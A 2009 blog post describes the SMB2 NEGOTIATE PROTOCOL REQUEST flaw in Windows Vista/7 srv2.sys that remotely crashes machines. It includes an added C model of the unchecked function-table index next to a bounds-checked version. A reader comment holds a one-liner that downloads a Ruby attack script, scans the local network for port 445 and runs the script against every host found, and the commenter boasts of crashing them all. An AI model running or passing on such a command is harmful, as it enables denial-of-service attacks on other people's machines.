Tuesday, September 8, 2009

Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. Exploit

An attacker can remotely crash any Vista/Windows 7 machine with SMB enabled.

BACKGROUND
-------------------------
Windows Vista and newer versions of Windows ship with a new version of SMB, named SMB2.
See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

DESCRIPTION
-------------------------
SRV2.SYS fails to handle malformed SMB headers in the NEGOTIATE PROTOCOL REQUEST functionality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to an SMB server; it is used to agree on the SMB dialect that will be used for further communication. Because it is the first packet of the session, it is processed before any authentication takes place.

PROOF OF CONCEPT
-------------------------

Update:

Added to Metasploit, thanks HD Moore :)

See also: Regarding Microsoft srv2.sys SMB2.0 NEGOTIATE BSOD

This vulnerability is not only a BSOD flaw. It allows remote code
execution. The execution of code is far from being reliable though (at
the moment).

The flaw is an out-of-bounds indexing. We can fully control the 16-bit
value used as the index within the function table.
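The bug class described above (a 16-bit word read straight out of the SMB header and used as an index into a function table with no range check), modelled in C as an added example. This is not the page's proof of concept and not srv2.sys code: the handler table, the choice of header offset 12 as the controlled word (PID High in the CIFS header layout; the page does not say which field srv2.sys actually used), and the sample packets are all constructed for illustration. The unchecked path is modelled as an offset computation so the program never actually reads past the table; the checked path shows the comparison that was missing.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of an SMB1 NEGOTIATE PROTOCOL REQUEST as carried over the NetBIOS
 * session service (TCP/445): 4-byte NBSS header, 32-byte SMB header, then the
 * parameter/data block. Offsets follow the CIFS header layout. */
#define NBSS_LEN          4
#define SMB_HDR_LEN       32
#define SMB_COM_NEGOTIATE 0x72
#define HDR_OFF_COMMAND   4   /* byte after the 0xFF 'S' 'M' 'B' magic */
#define HDR_OFF_INDEX     12  /* 16-bit word the model treats as the index;
                               * PID High in CIFS, an assumption of this model */

typedef int (*smb_handler_t)(const uint8_t *pkt, size_t len);

static int on_negotiate(const uint8_t *pkt, size_t len)     { (void)pkt; (void)len; return 1; }
static int on_session_setup(const uint8_t *pkt, size_t len) { (void)pkt; (void)len; return 2; }
static int on_tree_connect(const uint8_t *pkt, size_t len)  { (void)pkt; (void)len; return 3; }

/* Hypothetical function table that the controlled word indexes into. */
static const smb_handler_t dispatch_table[] = { on_negotiate, on_session_setup, on_tree_connect };
#define DISPATCH_ENTRIES (sizeof dispatch_table / sizeof dispatch_table[0])

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Build a NEGOTIATE request into buf. index_field is the 16-bit header word an
 * attacker controls; a well-formed client sends 0. Returns the packet length,
 * or 0 if buf is too small. */
size_t build_negotiate(uint8_t *buf, size_t cap, uint16_t index_field)
{
    static const uint8_t dialect[] = "\x02NT LM 0.12";        /* one dialect entry, NUL-terminated */
    const size_t body  = 1 /* WordCount */ + 2 /* ByteCount */ + sizeof dialect;
    const size_t total = NBSS_LEN + SMB_HDR_LEN + body;
    if (cap < total) return 0;
    memset(buf, 0, total);
    buf[2] = (uint8_t)((SMB_HDR_LEN + body) >> 8);             /* NBSS length, big-endian */
    buf[3] = (uint8_t)(SMB_HDR_LEN + body);
    uint8_t *hdr = buf + NBSS_LEN;
    memcpy(hdr, "\xffSMB", 4);
    hdr[HDR_OFF_COMMAND]   = SMB_COM_NEGOTIATE;
    hdr[HDR_OFF_INDEX]     = (uint8_t)(index_field & 0xff);   /* little-endian */
    hdr[HDR_OFF_INDEX + 1] = (uint8_t)(index_field >> 8);
    uint8_t *p = hdr + SMB_HDR_LEN;
    p[0] = 0;                                                  /* WordCount = 0 */
    p[1] = (uint8_t)(sizeof dialect & 0xff);                   /* ByteCount, little-endian */
    p[2] = (uint8_t)(sizeof dialect >> 8);
    memcpy(p + 3, dialect, sizeof dialect);
    return total;
}

/* Vulnerable pattern: the word is taken off the wire and used as a table index
 * with no range check, so any value >= DISPATCH_ENTRIES fetches a "function
 * pointer" from whatever memory follows the table and calls it. Modelled as an
 * offset computation (bytes from the table base) so nothing is dereferenced. */
size_t unchecked_table_offset(const uint8_t *pkt)
{
    return (size_t)le16(pkt + NBSS_LEN + HDR_OFF_INDEX) * sizeof(smb_handler_t);
}

/* 1 if the unchecked lookup would read past the end of dispatch_table. */
int unchecked_escapes_table(const uint8_t *pkt)
{
    return unchecked_table_offset(pkt) >= sizeof dispatch_table;
}

/* Hardened dispatch: length, magic and command are validated, and the index is
 * compared against the table size before it is used. Negative = rejected. */
int dispatch_checked(const uint8_t *pkt, size_t len)
{
    if (len < NBSS_LEN + SMB_HDR_LEN) return -1;               /* truncated header */
    const uint8_t *hdr = pkt + NBSS_LEN;
    if (memcmp(hdr, "\xffSMB", 4) != 0) return -2;             /* not an SMB1 header */
    if (hdr[HDR_OFF_COMMAND] != SMB_COM_NEGOTIATE) return -3;  /* only NEGOTIATE modelled */
    uint16_t idx = le16(hdr + HDR_OFF_INDEX);
    if (idx >= DISPATCH_ENTRIES) return -4;                    /* the missing bounds check */
    return dispatch_table[idx](pkt, len);
}

int main(void)
{
    uint8_t pkt[64];
    size_t n = build_negotiate(pkt, sizeof pkt, 0x1000);      /* constructed malformed request */
    printf("len=%zu unchecked_escapes=%d checked=%d\n",
           n, unchecked_escapes_table(pkt), dispatch_checked(pkt, n));
    return 0;
}
```

With the index word set to 0 the checked path dispatches to the negotiate handler; with any value at or above the table size the unchecked model reports that the lookup leaves the table, while the checked path rejects the packet before touching it. That single comparison is the whole difference between a crash (or, as the quoted note says, a controlled function-pointer read) and a dropped packet.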

1 comment:

digital-in said...

wget ***.lan.mystuff/clean445.rb && nmap -p445 $(ifconfig eth0 | head -2 | tail -1 | cut -d: -f2 | cut -d. -f 1,2,3).1-254 | grep -B3 open | grep -o -e '[0-9]\+\.[0-9]\+\.[0-9]\+\.[0-9]\+' | xargs ruby clean445.rb
BSoDs every Windows Vista / 7 with 445 open on my LAN. So nice!!